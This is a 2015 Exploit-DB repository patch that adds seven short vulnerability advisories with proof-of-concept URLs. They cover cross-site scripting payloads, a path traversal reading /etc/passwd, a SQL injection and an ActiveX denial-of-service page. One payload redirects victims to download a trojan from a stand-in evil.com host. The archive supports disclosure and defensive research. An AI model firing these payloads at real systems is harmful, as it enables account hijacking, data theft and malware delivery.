From d6eaf562907c7e982a4a3a4fd94253dd08c1fd7a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 24 Jul 2015 05:02:14 +0000
Subject: [PATCH] DB: 2015-07-24

7 new exploits
---
 files.csv                           | 15 +++++++++++----
 platforms/asp/webapps/37676.txt     |  9 +++++++++
 platforms/multiple/remote/37671.txt |  8 ++++++++
 platforms/php/webapps/37672.txt     |  9 +++++++++
 platforms/php/webapps/37674.txt     |  7 +++++++
 platforms/php/webapps/37675.txt     |  7 +++++++
 platforms/php/webapps/37677.txt     |  7 +++++++
 platforms/windows/remote/37673.html |  9 +++++++++
 8 files changed, 67 insertions(+), 4 deletions(-)
 create mode 100755 platforms/asp/webapps/37676.txt
 create mode 100755 platforms/multiple/remote/37671.txt
 create mode 100755 platforms/php/webapps/37672.txt
 create mode 100755 platforms/php/webapps/37674.txt
 create mode 100755 platforms/php/webapps/37675.txt
 create mode 100755 platforms/php/webapps/37677.txt
 create mode 100755 platforms/windows/remote/37673.html

diff --git a/files.csv b/files.csv
index 0ab23d2bf..68d36dbc7 100755
--- a/files.csv
+++ b/files.csv
@@ -5245,7 +5245,7 @@ id,file,description,date,author,platform,type,port
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
-5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (perl)",2008-05-15,"Markus Mueller",multiple,remote,22
+5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",multiple,remote,22
 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
@@ -5255,7 +5255,7 @@ id,file,description,date,author,platform,type,port
 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
-5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
+5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,multiple,remote,22
 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@@ -13296,7 +13296,7 @@ id,file,description,date,author,platform,type,port
 15609,platforms/windows/local/15609.txt,"Windows Vista/7 - Elevation of Privileges (UAC Bypass) (0day)",2010-11-24,noobpwnftw,windows,local,0
 15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0
 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
-15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker $ORIGIN expansion Vulnerability",2010-10-18,"Tavis Ormandy",linux,local,0
+15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - $ORIGIN expansion Vulnerability",2010-10-18,"Tavis Ormandy",linux,local,0
 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
@@ -15762,7 +15762,7 @@ id,file,description,date,author,platform,type,port
 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0
 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0
 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
-18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
+18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
 18156,platforms/php/webapps/18156.txt,"php video script SQL Injection Vulnerability",2011-11-25,longrifle0x,php,webapps,0
 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0
 18162,platforms/linux/shellcode/18162.c,"Linux/MIPS - execve /bin/sh - 48 bytes",2011-11-27,rigan,linux,shellcode,0
@@ -33999,3 +33999,10 @@ id,file,description,date,author,platform,type,port
 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Reza Espargham",windows,remote,0
 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
 37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
+37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
+37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
+37673,platforms/windows/remote/37673.html,"Microsoft Indexing Service 'ixsso.dll' ActiveX Control Denial of Service Vulnerability",2012-08-24,coolkaveh,windows,remote,0
+37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include Vulnerability",2012-08-24,"Yakir Wizman",php,webapps,0
+37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0
+37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
+37677,platforms/php/webapps/37677.txt,"Wordpress Finder 'order' Parameter Cross Site Scripting Vulnerability",2012-08-25,Crim3R,php,webapps,0
diff --git a/platforms/asp/webapps/37676.txt b/platforms/asp/webapps/37676.txt
new file mode 100755
index 000000000..5a064bf72
--- /dev/null
+++ b/platforms/asp/webapps/37676.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55216/info
+
+Power-eCommerce is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com//Questions.asp?id="><script>alert(0);</script>
+
+http://www.example.com/search.asp?7="><script>alert(0);</script>&Search=Search 
\ No newline at end of file
diff --git a/platforms/multiple/remote/37671.txt b/platforms/multiple/remote/37671.txt
new file mode 100755
index 000000000..0262c0c3d
--- /dev/null
+++ b/platforms/multiple/remote/37671.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/55194/info
+
+Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evilanother.com%2fimages%2fcross_site.jpg>
+https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>
diff --git a/platforms/php/webapps/37672.txt b/platforms/php/webapps/37672.txt
new file mode 100755
index 000000000..6e2b1e2c4
--- /dev/null
+++ b/platforms/php/webapps/37672.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55199/info
+
+JW Player is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JW Player 5.10.2295 and prior versions are also vulnerable. 
+
+http://www.example.com/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
\ No newline at end of file
diff --git a/platforms/php/webapps/37674.txt b/platforms/php/webapps/37674.txt
new file mode 100755
index 000000000..9b9e37496
--- /dev/null
+++ b/platforms/php/webapps/37674.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55205/info
+
+PHP Web Scripts Text Exchange Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 
+
+http://www.example.com/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/37675.txt b/platforms/php/webapps/37675.txt
new file mode 100755
index 000000000..4a15f3449
--- /dev/null
+++ b/platforms/php/webapps/37675.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55212/info
+
+The Komento component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+www.example.com/component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection] 
\ No newline at end of file
diff --git a/platforms/php/webapps/37677.txt b/platforms/php/webapps/37677.txt
new file mode 100755
index 000000000..9d4b63dc5
--- /dev/null
+++ b/platforms/php/webapps/37677.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55217/info
+
+The Finder plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/windows/remote/37673.html b/platforms/windows/remote/37673.html
new file mode 100755
index 000000000..e76ade42d
--- /dev/null
+++ b/platforms/windows/remote/37673.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55202/info
+
+Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.
+
+An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
+
+The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. 
+
+<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script> 
\ No newline at end of file